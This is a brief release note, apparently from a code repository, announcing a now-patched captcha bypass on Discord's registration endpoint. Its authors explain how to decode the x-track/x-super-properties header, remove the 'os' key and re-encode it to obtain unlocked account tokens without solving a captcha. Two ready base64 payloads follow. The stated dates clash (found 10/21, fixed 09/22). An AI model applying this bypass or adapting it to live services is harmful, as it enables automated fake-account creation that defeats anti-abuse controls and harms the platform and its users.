EXPLOIT PATCHED > 25/10/2022 <

The exploit was found on the 10/21, but was making locked tokens, a fix was found on the 09/22

We (bytix (https://github.com/d4c5d1e0), xth24/fritz) found a way to remove captchas on register by manipulating the x-track/x-super-properties sent to the register endpoint.

You need to decode your x-track/x-super-properties and then remove the "os" key in the json, encrypt it, and then use it to make a request to the register endpoint, if you manipulate it correctly, you will get an unlocked token, without any captcha solved.

We are releasing that exploit because some people found it, and we don't want them to make money with it.

eyJjbGllbnRfYnVpbGRfbnVtYmVyIjo5OTk5fQ==

eyJvcyI6bnVsbCwiYnJvd3NlciI6IkNocm9tZSIsImRldmljZSI6IiIsInN5c3RlbV9sb2NhbGUiOiJlbi1VUyIsImJyb3dzZXJfdXNlcl9hZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMDUuMC4wLjAgU2FmYXJpLzUzNy4zNiIsImJyb3dzZXJfdmVyc2lvbiI6IjEwNS4wLjAuMCIsIm9zX3ZlcnNpb24iOiIxMCIsInJlZmVycmVyIjoiaHR0cHM6Ly9kaXNjb3JkLmNvbS9jaGFubmVscy9AbWUiLCJyZWZlcnJpbmdfZG9tYWluIjoiZGlzY29yZC5jb20iLCJyZWZlcnJlcl9jdXJyZW50IjoiIiwicmVmZXJyaW5nX2RvbWFpbl9jdXJyZW50IjoiIiwicmVsZWFzZV9jaGFubmVsIjoic3RhYmxlIiwiY2xpZW50X2J1aWxkX251bWJlciI6OTk5OSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=